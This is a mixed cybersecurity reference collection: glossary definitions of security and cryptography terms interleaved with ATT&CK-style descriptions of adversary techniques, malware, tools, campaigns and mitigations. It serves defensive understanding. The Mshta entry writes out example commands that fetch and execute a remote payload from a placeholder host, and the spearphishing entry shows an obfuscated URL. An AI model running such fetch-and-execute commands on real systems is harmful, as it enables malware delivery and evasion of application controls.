Description: Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

Term: oscillator
Definition: An electronic device used to generate an oscillating signal. The oscillation is based on a periodic event that repeats at a constant rate. The device that controls this event is called a resonator. The resonator needs an energy source so it can sustain oscillation. Taken together, the energy source and resonator form an oscillator. Although many simple types of oscillators (both mechanical and electronic) exist, the two types of oscillators primarily used for time and frequency measurements are quartz oscillators and atomic oscillators.

Term: assurance
Definition: Grounds for justified confidence that a [security or privacy] claim has been or will be achieved. Note 1: Assurance is typically obtained relative to a set of specific claims. The scope and focus of such claims may vary (e.g., security claims, safety claims) and the claims themselves may be interrelated. Note 2: Assurance is obtained through techniques and methods that generate credible evidence to substantiate claims.

Term: onboarding credentials
Definition: The unique credentials that the IoT device requires to connect securely to the local network (e.g., network identifier, unique network password, X.509 certificate and associated private key, etc.). They may also include additional configuration information (e.g., URLs and public keys for reaching and authenticating controllers and servers) to enable the device to perform application-layer onboarding and thereby become operational at the application layer once it has securely connected to the network. In contrast to device bootstrapping credentials, which are independent of context, device onboarding credentials are locally significant.

Term: Memorandum of Understanding or Agreement
Definition: A document established between two or more parties to define their respective responsibilities in accomplishing a particular goal or mission. In this guide, an MOU/A defines the responsibilities of two or more organizations in establishing, operating, and securing a system interconnection.

Term: mutual authentication
Definition: Occurs when parties at both ends of a communication activity authenticate each other (see authentication).

Term: Digital Fingerprint
Definition: A crytpographic checksum, typically generated for a file that can be used to detect changes to the file.. Synonyous with hash value/result.

Term: role-based access control (RBAC)
Definition: Access control based on user roles (i.e., a collection of access authorizations a user receives based on an explicit or implicit assumption of a given role). Role permissions may be inherited through a role hierarchy and typically reflect the permissions needed to perform defined functions within an organization. A given role may apply to a single individual or to several individuals.

Term: SPARQL
Definition: SPARQL Protocol and RDF Query Language

Term: C
Definition: The ciphertext.

Term: Trusted Party
Definition: A party that can be expected to keep sensitive data safe and not disclose it to others.

Term: common criteria
Definition: A set of internationally accepted semantic tools and constructs for describing the security needs of customers and the security attributes of products.

Term: GAN
Definition: A machine learning framework in which two neural net­works contest with each other in the form of a zero-sum game, where one agent’s gain is another agent’s loss. A GAN learns to generate new data with the same statistics as the training set.

Term: Quasi
Definition: A bit string representation of the octet length of P.

Term: Complementary Error Function
Definition: The complementary error function erfc(z) is defined in Section 5.5.3. This function is related to the normal cdf.

Name: pwdump
Type: tool
Description: pwdump is a credential dumper.

Term: Secure Transport
Definition: Transfer of information using a transport layer protocol that provides security between applications communicating over an IP network.

Term: Web Services Security (WS -Security)
Definition: A mechanism for incorporating security information into SOAP messages. WS-Security uses binary tokens for authentication, digital signatures for integrity, and content-level encryption for confidentiality.

Name: Exploit Public-Facing Application
Type: attack-pattern
Description: Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets. On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers. Depending on the flaw being exploited, this may also involve Exploitation for Stealth or Exploitation for Client Execution.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the Cloud Instance Metadata API), exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.

Term: Subject (in a certificate)
Definition: The entity authorized to use the private key associated with the public key in the certificate.

Term: privacy plan
Definition: A formal document that details the privacy controls selected for an information system or environment of operation that are in place or planned for meeting applicable privacy requirements and managing privacy risks, details how the controls have been implemented, and describes the methodologies and metrics that will be used to assess the controls.

Name: Software Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Such software may be deployed widely across the environment for configuration management or security reasons, such as Software Deployment Tools, and may allow adversaries broad access to infect devices or move laterally.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.

Term: Randomness extraction
Definition: The first step in the key derivation procedure specified in this Recommendation, which produces a key derivation key from a shared secret.

Term: Pseudorandom key
Definition: As used in this Recommendation, a binary string that is taken from the output of a PRF.

Name: ArcaneDoor
Type: campaign
Description: ArcaneDoor is a campaign targeting networking devices from Cisco and other vendors between July 2023 and April 2024, primarily focused on government and critical infrastructure networks. ArcaneDoor is associated with the deployment of the custom backdoors Line Runner and Line Dancer. ArcaneDoor is attributed to a group referred to as UAT4356 or STORM-1849, and is assessed to be a state-sponsored campaign.

Term: Tabletop Exercise
Definition: A discussion-based exercise where personnel with roles and responsibilities in a particular IT plan meet in a classroom setting or in breakout groups to validate the content of the plan by discussing their roles during an emergency and their responses to a particular emergency situation. A facilitator initiates the discussion by presenting a scenario and asking questions based on the scenario.

Term: system of systems
Definition: System-of-interest whose system elements are themselves systems; typically, these entail large-scale interdisciplinary problems with multiple heterogeneous distributed systems. Note: In the system-of-systems environment, constituent systems may not have a single owner, may not be under a single authority, or may not operate within a single set of priorities.

Name: Dynamic Resolution
Type: attack-pattern
Description: Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.

Term: Two-key Triple Data Encryption Algorithm
Definition: Two-key Triple Data Encryption Algorithm specified in [NIST SP 800-67].

Term: cryptographic system analysis
Definition: Process of establishing the exploitability of a cryptographic system, normally by reviewing transmitted traffic protected or secured by the system under study.

Name: Bandook
Type: malware
Description: Bandook is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. Bandook has been used by Dark Caracal, as well as in a separate campaign referred to as "Operation Manul".

Name: Mshta
Type: attack-pattern
Description: Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code 

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. 

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Term: Virtualization
Definition: The use of an abstraction layer to simulate computing hardware so that multiple operating systems can run on a single computer.

Term: mutual authentication
Definition: Two parties authenticating each other at the same time. Also known as mutual authentication or two-way authentication.

Term: Security Authorization
Definition: The process that takes place after authentication is complete to determine which resources/services are available to a WiMAX device.

Term: Entity authentication
Definition: A process that establishes the origin of information, or determines an entity’s identity to the extent permitted by the entity’s identifier.

Term: honeypot
Definition: A system (e.g., a web server) or system resource (e.g., a file on a server) that is designed to be attractive to potential crackers and intruders, like honey is attractive to bears.

Term: authenticated-decryption function
Definition: A function that decrypts purported ciphertext into corresponding plaintext and verifies the authenticity and, therefore, the integrity of the data. The output is either the plaintext or an indication that the plaintext is not authentic.

Name: System Location Discovery
Type: attack-pattern
Description: Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from System Location Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings. Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host. In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.

Name: Linux and Mac Permissions
Type: attack-pattern
Description: Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Term: satellite
Definition: Bus and payload combined into one operational asset.

Name: AuTo Stealer
Type: malware
Description: AuTo Stealer is malware written in C++ has been used by SideCopy since at least December 2021 to target government agencies and personnel in India and Afghanistan.

Term: CIO
Definition: <p>Executive agency official responsible for:&nbsp;</p><p>(1) providing advice and other assistance to the head of the executive agency and other senior management personnel of the executive agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency;&nbsp;</p><p>(2) developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the executive agency; and&nbsp;</p><p>(3) promoting the effective and efficient design and operation of all major information resources management processes for the executive agency, including improvements to work processes of the executive agency.</p><p>Note: Organizations subordinate to federal agencies may use the term Chief Information Officer to denote individuals filling positions with similar security responsibilities to agency-level Chief Information Officers.</p>

Term: Network Address Translation (NAT)
Definition: A function by which internet protocol addresses within a packet are replaced with different IP addresses. This function is most commonly performed by either routers or firewalls. It enables private IP networks that use unregistered IP addresses to connect to the internet. NAT operates on a router, usually connecting two networks together, and translates the private (not globally unique) addresses in the internal network into legal addresses before packets are forwarded to another network.

Term: Public-key validation
Definition: The procedure whereby the recipient of a public key checks that the key conforms to the arithmetic requirements for such a key in order to thwart certain types of attacks.

Term: Byte
Definition: A string of eight bits.

Name: Seth-Locker
Type: malware
Description: Seth-Locker is a ransomware with some remote control capabilities that has been in use since at least 2021.

Term: KiB
Definition: 2<sup>10</sup> bytes.

Name: Subvert Trust Controls
Type: attack-pattern
Description: Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls. Adversaries may also create or steal code signing certificates to acquire trust on target systems.

Term: senior agency official for privacy
Definition: A senior official designated by the head of each agency to have agency-wide responsibilities for privacy, including the implementation of privacy protections; compliance with federal laws, regulations, and policies related to privacy; the management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Name: Bisonal
Type: malware
Description: Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.

Term: Exercise Briefing
Definition: Material that is presented to participants during an exercise to outline the exercise’s agenda, objectives, scenario, and other relevant information.

Term: penetration-resistant architecture
Definition: An architecture that uses technology and procedures to limit the opportunities for an adversary to compromise an organizational system and to achieve a persistent presence in the system.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the chief information officer (CIO) responsibilities under the Federal Information Security Management Act (FISMA) and who serves as the CIO’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. Note: Also known as senior information security officer (SISO) or chief information security officer (CISO).

Term: critical AI system
Definition: Any system incorporating critical software and in which failure can cause substantial harm to the public.

Term: trust relationship
Definition: An agreed upon relationship between two or more system elements that is governed by criteria for secure interaction, behavior, and outcomes relative to the protection of assets. 
Note: This refers to trust relationships between system elements implemented by hardware, firmware, and software.

Term: correct re-identifications
Definition: Putative re-identifications that correctly infer an individual's identity and associated data.

Term: American Registry for Internet Numbers
Definition: The American Registry for Internet Numbers for Canada, the United States of America, and many Caribbean and North Atlantic Islands.

Term: Fail to Known State
Definition: Upon a disruption event that causes the system to fail, it fails to a pre-determined state. Failure in a known safe state helps to prevent systems from failing to a state that may cause injury to individuals or destruction to property. Preserving manufacturing system state information facilitates system restart and return to the operational mode of organizations with less disruption of mission/business processes.

Term: <strong>client</strong>
Definition: A system entity, usually a computer process acting on behalf of a human user, that makes use of a service provided by a server.

Term: Trusted Third Party
Definition: A third party, such as a CA, that is trusted by its clients to perform certain services. (By contrast, the two participants in a key-establishment transaction are considered to be the first and second parties.)

Term: attribute
Definition: Information associated with a key that is not used in cryptographic algorithms, but is required to implement applications and applications protocols.

Term: clock
Definition: A device that generates periodic, accurately spaced signals for timekeeping applications. A clock consists of at least three parts: an oscillator, a device that counts the oscillations and converts them to units of time interval (such as seconds, minutes, hours, and days), and a means of displaying or recording the results.

Term: Approximate Entropy Test
Definition: The purpose of the test is to compare the frequency of overlapping blocks of two consecutive/adjacent lengths (m and m+1) against the expected result for a normally distributed sequence.

Term: <em><strong>xmodn</strong></em>
Definition: The unique remainder r (where 0£ r £ n-1) when integer x is divided by n. For example, 23 mod 7 = 2.

Term: awareness content
Definition: Content that is designed and implemented to help employees understand how their actions may impact or influence vulnerabilities and threats. Organizations provide various types of awareness materials (e.g., posters, newsletters, websites) so that employees can realize their roles in protecting cyber assets.

Term: information owner
Definition: Official with statutory or operational authority for specified information and responsibility for establishing the controls for its generation, classification, collection, processing, dissemination, and disposal.

Term: generative adversarial networks
Definition: A machine learning framework in which two neural net­works contest with each other in the form of a zero-sum game, where one agent’s gain is another agent’s loss. A GAN learns to generate new data with the same statistics as the training set.

Term: system security plan
Definition: See System Security Plan.

Term: Syslog
Definition: A protocol that specifies a general log entry format and a log entry transport mechanism.

Term: electronically generated key
Definition: Key generated in a COMSEC device by introducing (either mechanically or electronically) a seed key into the device and then using the seed, together with a software algorithm stored in the device, to produce the desired key.

Term: traceability
Definition: Discernible association among two or more logical entities, such as requirements, system elements, verifications, or tasks.

Name: Systeminfo
Type: tool
Description: Systeminfo is a Windows utility that can be used to gather detailed information about a computer.

Term: critical infrastructure
Definition: System and assets, whether physical or virtual, so vital to the U.S. that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.

Term: keying material
Definition: A cryptographic key and other parameters (e.g., IVs or domain parameters) used with a cryptographic algorithm.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. 
Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls or privacy controls planned or in place. Synonymous with risk analysis.

Name: Execution Guardrails
Type: attack-pattern
Description: Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.

Term: token
Definition: Something that the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. This was previously referred to as a token.

Name: Active Scanning
Type: attack-pattern
Description: Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).

Term: keying material
Definition: Key, code, or authentication information in physical, electronic, or magnetic form. It includes key tapes and list, codes, authenticators, one-time pads, floppy disks, and magnetic tapes containing keys, plugs, keyed microcircuits, electronically generated key, etc.

Term: Personal Information Management (PIM) Applications
Definition: A core set of applications that provide the electronic equivalents of such items as an agenda, address book, notepad, and reminder list.

Term: baseline configuration
Definition: A documented set of specifications for a system or a configuration item within a system that has been formally reviewed and agreed upon at a given point in time, and that can only be changed through change control procedures.

Term: Cryptographic API: Next Generation
Definition: The long-term replacement for the Cryptographic Application Programming Interface (CAPI).

Term: digital identity
Definition: An attribute or set of attributes that uniquely describes a subject within a given context.

Term: <em>|x|</em>
Definition: The length (in bits) of the bit string x. For example, |01100100| = 8.

Term: Authentication code
Definition: A keyed cryptographic checksum based on an approved security function; also known as a Message Authentication Code.

Term: portable storage device
Definition: See portable storage device.

Term: Group Identifier Level 1
Definition: an identifier for a particular SIM and handset association, which can be used to identify a group of SIMs involved in a particular application.

Term: external assessment engagement
Definition: Formal engagement led by a third-party assessment organization.

Term: Initialization Vector (IV)
Definition: The initialization vector.

Term: SwA
Definition: The level of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its life cycle and that the software functions in the intended manner.

Term: Certificate-inventory management
Definition: Establishing and maintaining records of the keys and/or certificates in use, assigning and tracking their owners or sponsors, monitoring key and certificate status, and reporting the status to the appropriate official for remedial action when required.

Term: classification
Definition: The task of predicting which of a set of discrete categories an input belongs to.

Term: <em>Z</em>
Definition: A shared secret that is used to derive secret keying material using a key-derivation method; a byte string.

Term: Legacy Environment
Definition: Typical Custom environment usually involving older systems or applications.

Term: Policy
Definition: Statements, rules or assertions that specify the correct or expected behavior of an entity. For example, an authorization policy might specify the correct access control rules for a software component.

Name: Darkhotel
Type: intrusion-set
Description: Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.

Term: page check
Definition: The verification of the presence of each required page in a physical publication.

Term: public domain software
Definition: Software not protected by copyright laws of any nation that may be freely used without permission of or payment to the creator, and that carries no warranties from or liabilities to the creator.

Term: Certificate Status Authority
Definition: A trusted entity that provides on-line verification to a relying party of a subject certificate's trustworthiness, and may also provide additional attribute information for the subject certificate.

Term: IS
Definition: A discrete set of resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.

Name: ProLock
Type: malware
Description: ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.

Term: <em>MacTagLen</em>
Definition: The byte length of MacTag.

Term: Integrity authentication
Definition: The process of determining the integrity of the data; also called data integrity authentication.

Name: Spearphishing Link
Type: attack-pattern
Description: Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack"). URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.

Adversaries may also utilize links to perform consent phishing/spearphishing campaigns to Steal Application Access Tokens that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications. These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.

Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.

Name: Exfiltration over USB
Type: attack-pattern
Description: Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Term: applicant
Definition: The subscriber is sometimes also called an "applicant" after applying to a certification authority for a certificate, but before the certificate issuance procedure is completed.

Term: ID
Definition: The set of attribute values (i.e., characteristics) by which an entity is recognizable and that, within the scope of an identity manager’s responsibility, is sufficient to distinguish that entity from any other entity.

Term: IS
Definition: Discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.

Term: assurance of integrity
Definition: The security objective that generates the requirement for protection against either intentional or accidental attempts to violate data integrity (the property that data has not been altered in an unauthorized manner) or system integrity (the quality that a system has when it performs its intended function in an unimpaired manner, free from unauthorized manipulation).

Term: accountability
Definition: The principle that an individual is entrusted to safeguard and control equipment, keying material, and information and is answerable to proper authority for the loss or misuse of that equipment or information.

Term: audit trail
Definition: A record showing who has accessed an IT system and what operations the user has performed during a given period.

Term: Requester
Definition: The entity requesting to perform an operation upon the object.

Term: verifier
Definition: The entity that verifies the authenticity of a digital signature using the public key of the signatory.

Term: iBGP
Definition: A BGP operation communicating routing information within an AS.

Term: Station
Definition: A client device in a wireless network.

Term: Actuating Capability
Definition: The ability to change something in the physical world.

Term: Ledger
Definition: A record of transactions.

Term: enabling system
Definition: A system that provides support to the life cycle activities associated with the system of interest. Enabling systems are not necessarily delivered with the system of interest and do not necessarily exist in the operational environment of the system of interest.

Term: Block data
Definition: The portion of a block that contains a set of validated transactions and ledger events.

Term: data integrity
Definition: A property whereby data has not been altered in an unauthorized manner since it was created, transmitted or stored. 
In this Recommendation, the statement that a cryptographic algorithm "provides data integrity" means that the algorithm is used to detect unauthorized alterations.

Name: Filter Network Traffic
Type: course-of-action
Description: Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration. This mitigation can be implemented through the following measures:

Ingress Traffic Filtering:

- Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.
- Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.

Egress Traffic Filtering:

- Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.
- Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.

Protocol-Based Filtering:

- Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.
- Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.

Network Segmentation:

- Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.
- Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.

Application Layer Filtering:

- Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.
- Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques.

Term: Key generation
Definition: The process of generating keys for cryptography.

Term: facility
Definition: One or more physical locations containing systems or system components that process, store, or transmit information.

Term: CBEFF Basic Structure
Definition: The basic CBEFF structure consists of a single Standard Biometric Header followed by a Biometric Data Block and an optional Signature Block

Term: denial of service (DoS)
Definition: The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided).

Term: apply cryptographic protection
Definition: Depending on the algorithm, to encrypt or sign data, generate a hash function or Message Authentication Code (MAC), or establish keys (including wrapping and deriving keys).

Term: coverage
Definition: The surface area or space volume in which the signals are adequate to permit the user to determine a position to a specified level of accuracy. Coverage is influenced by system geometry, signal power levels, receiver sensitivity, atmospheric noise conditions, and other factors that affect signal availability.

Name: Dylib Hijacking
Type: attack-pattern
Description: Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path. Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.

Term: safety
Definition: Expectation that a system does not, under defined conditions, lead to a state in which human life, health, property, or the environment is endangered.

Term: Memorandum of Understanding or Agreement
Definition: Agreement between the Federal PKI Policy Authority and an Agency allowing interoperability between the Agency Principal CA and the FBCA.

Term: authorize processing
Definition: The granting or denying of access rights to a user, program, or process.

Term: body of evidence
Definition: The totality of evidence used to substantiate trust, trustworthiness, and risk relative to the system.

Term: Code Division Multiple Access (CDMA)
Definition: A spread spectrum technology for cellular networks based on the Interim Standard-95 (IS-95) from the Telecommunications Industry Association (TIA).

Term: Access Vector
Definition: reflects the access required to exploit the vulnerability.

Term: judgment value
Definition: Predefined values that represent the possible choices that an assessor makes in judging whether or how well the gathered information satisfies an assessment element.

Term: proper working state
Definition: A condition in which the device or system contains no compromised internal components or data fields (e.g., data stored to memory) and from which the device or system can recognize and process valid input signals and output valid PNT solutions. An initial pre-deployment configuration is a basic example. The accuracy of the immediate PNT solution is not specified in this definition, as it will depend on the specifics of the device or system’s performance and the degradation allowed by different resilience levels.

Term: <em>0s</em>
Definition: The bit string that consists of s consecutive ‘0’ bits.

Term: issuer
Definition: The organization that is issuing the PIV Card (or DPC) to an applicant. Typically, this is an organization for which the applicant is working.

Term: FIPS PUB
Definition: Federal Information Processing Standard Publication

Term: party
Definition: An individual (person), organization, device, or process. “Party” is a synonym.

Name: Mythic
Type: tool
Description: Mythic is an open source, cross-platform post-exploitation/command and control platform. Mythic is designed to "plug-n-play" with various agents and communication channels. Deployed Mythic C2 servers have been observed as part of potentially malicious infrastructure.

Term: Cross-certify
Definition: The establishment of a trust relationship between two Certification Authorities (CAs) through the signing of each other's public key in certificates; referred to as a “cross-certificate.”

Name: Environment Variable Permissions
Type: course-of-action
Description: Restrict the modification of environment variables to authorized users and processes by enforcing strict permissions and policies. This ensures the integrity of environment variables, preventing adversaries from abusing or altering them for malicious purposes. This mitigation can be implemented through the following measures:

Restrict Write Access:

- Use Case: Set file system-level permissions to restrict access to environment variable configuration files (e.g., `.bashrc`, `.bash_profile`, `.zshrc`, `systemd` service files).
- Implementation: Configure `/etc/environment` or `/etc/profile` on Linux systems to only allow root or administrators to modify the file.

Secure Access Controls:

- Use Case: Limit access to environment variable settings in application deployment tools or CI/CD pipelines to authorized personnel.
- Implementation: Use role-based access control (RBAC) in tools like Jenkins or GitLab to ensure only specific users can modify environment variables.

Restrict Process Scope:

- Use Case: Configure policies to ensure environment variables are only accessible to the processes they are explicitly intended for.
- Implementation: Use containerized environments like Docker to isolate environment variables to specific containers and ensure they are not inherited by other processes.

Audit Environment Variable Changes:

- Use Case: Enable logging for changes to critical environment variables.
- Implementation: Use `auditd` on Linux to monitor changes to files like `/etc/environment` or application-specific environment files.

Term: Reverse Channel
Definition: See back channel

Term: nonce
Definition: See Cryptographic Nonce

Term: Syntax
Definition: The rules for constructing or recognizing the acceptable sentences of a language.

Term: AC
Definition: The process of granting access to information technology (IT) system resources only to authorized users, programs, processes, or other systems.

Name: Installer Packages
Type: attack-pattern
Description: Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.

